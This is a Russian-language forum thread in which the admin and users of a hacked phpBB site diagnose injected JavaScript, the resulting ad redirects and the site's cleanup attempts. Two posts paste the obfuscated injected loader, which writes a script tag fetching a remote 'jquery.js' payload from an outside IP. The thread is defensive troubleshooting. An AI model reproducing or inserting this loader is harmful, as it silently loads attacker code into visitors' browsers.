Осторожно, убьёт!

Все вопросы, связанные с форумом

Postby thims » Mon, 19.06.2017 00:39:30

А мне браузер только что сказал, что forum.tslabs.info может угрожать безопасности моего компьютера. В качестве причины указал на то, что форум пытается загрузить данные из 134.249.116.78/jquery.js, что по данным браузера, является вредоносным программным кодом. Такие дела...
User avatar
thims
 
Posts: 135
Joined: Fri, 27.07.2012 17:18:35

Postby TS-Labs » Mon, 19.06.2017 03:40:50

fixed.
В \store\mods\tapatalk-phpbb3\root\mobiquo\smartbanner\appbanner.js обнаружено говно:
Code: Select all
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Алсо, надо апдейтить движло форума (и ёбаный тапатолк вместе с ним, ибо новые релизы только под phpbb 3.1) но с форума послетают всякие примочки, пиленные вручную.
Ждём, пролезет ли говно ещё раз, если да, то таки придётся поразвлечься.
User avatar
TS-Labs
 
Posts: 4655
Joined: Thu, 26.07.2012 01:29:56

Postby nyuk » Mon, 19.06.2017 17:00:12

примочки не нужны. а если с обновлением еще и смайлы слетят, то я просто вот праздник золотого дождя устрою!
не отрастил
User avatar
nyuk
 
Posts: 555
Joined: Thu, 26.07.2012 09:08:24

Postby thims » Wed, 21.06.2017 19:20:08

Опять началось...
User avatar
thims
 
Posts: 135
Joined: Fri, 27.07.2012 17:18:35

Postby TS-Labs » Wed, 21.06.2017 20:53:38

Грохнул тапатолк.
User avatar
TS-Labs
 
Posts: 4655
Joined: Thu, 26.07.2012 01:29:56

Postby TS-Labs » Sun, 25.06.2017 21:52:19

Опять цапануло. Удолил.
Вернул тапатолк. Поставил ридонли на файлы, которые заражало. Против лома нет приёма.
User avatar
TS-Labs
 
Posts: 4655
Joined: Thu, 26.07.2012 01:29:56

Postby creator » Sun, 02.07.2017 22:00:27

Всё равно что-то гаденькое сидит. Перекидывает на h t t p : // www. cpm10. com / watch?key=блаблабла и оттуда далее.
А, влип, очкарик!
User avatar
creator
 
Posts: 210
Joined: Wed, 11.02.2015 11:22:49
Location: nsk

Postby Alex Rider » Sun, 02.07.2017 23:52:17

+1, Каспер ругается:

02.07.2017 23.50.38
Dangerous URL blocked: http://134.249.116.78/jquery.js
URL listed in database of malicious URLs
Google Chrome
User avatar
Alex Rider
 
Posts: 326
Joined: Tue, 03.06.2014 15:35:47
Location: Ryazan, Russia

Postby creator » Mon, 03.07.2017 06:39:30

А я сделал так:
Code: Select all
route -p add 134.249.116.78 mask 255.255.255.255 192.168.1.100
:)
А, влип, очкарик!
User avatar
creator
 
Posts: 210
Joined: Wed, 11.02.2015 11:22:49
Location: nsk

Postby moroz1999 » Thu, 20.07.2017 22:12:55

Какая-то хрень заражает исходники форума, вписывает такие строчки:
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Этому подвержены фрагменты ABBC3_Ajax_indicator и MOD : MSSTI ABBC3 (v3.0.11).

Больше деталей снаружи не видно, зараза перенаправляет на рекламу через какой-то мутный гейт. Ищи траюна на серваке, должон быть где-то. Есть вероятность, что заражает рандомные JS файлы, вписывая в начало файла эту ересь.
User avatar
moroz1999
 
Posts: 1842
Joined: Wed, 01.08.2012 11:23:51

Postby VBI » Fri, 21.07.2017 09:16:15

ХУЁВО
передал вопрос тех.директору

директор сказал обновлять форум
User avatar
VBI
 
Posts: 1740
Joined: Mon, 03.06.2013 09:20:29

Postby moroz1999 » Fri, 21.07.2017 19:53:50

Стопудово есть скриптота на серваке, ищите да обрящете.
User avatar
moroz1999
 
Posts: 1842
Joined: Wed, 01.08.2012 11:23:51

Postby TS-Labs » Sat, 22.07.2017 03:12:00

Для директоров в доступной форме.
Также, директору предлагается сравнить файлы, лежащие в папке форума, с контентом, приезжающим в браузер.
Может тогда обрящет.
User avatar
TS-Labs
 
Posts: 4655
Joined: Thu, 26.07.2012 01:29:56

Postby moroz1999 » Sun, 23.07.2017 18:01:28

Ну, не сам же браузер заражает скачиваемые скрипты? И не прокси в процессе дописывает хвост к яваскриптам.
Там довольно просто же:
1. Есть успешная попытка взлома сервера, в ходе чего на сервер попал вредный вирус/скрипт/заменен файл. Скорее всего, автоматом были найдены файлы с расширением JS и к ним приписан хвост. Еще бывает, что в php файлы вписывают html-кусок, содержащий <script>.
2. Эти модифицированные JS файлы, будучи скачанными браузером, подкачивают payload с названием jquery.js . Что там внутри - хз, может быть что угодно и каждый раз разное.

То есть, чинить надо не jquery, он тут нипричем, чинить надо модифицированные яваскрипты (походу, пострадали плагины форума). Но до этого надо задаться вопросом - как JS файлы были модифицированы?
User avatar
moroz1999
 
Posts: 1842
Joined: Wed, 01.08.2012 11:23:51


Return to Forum related

Who is online

Users browsing this forum: No registered users and 1 guest

x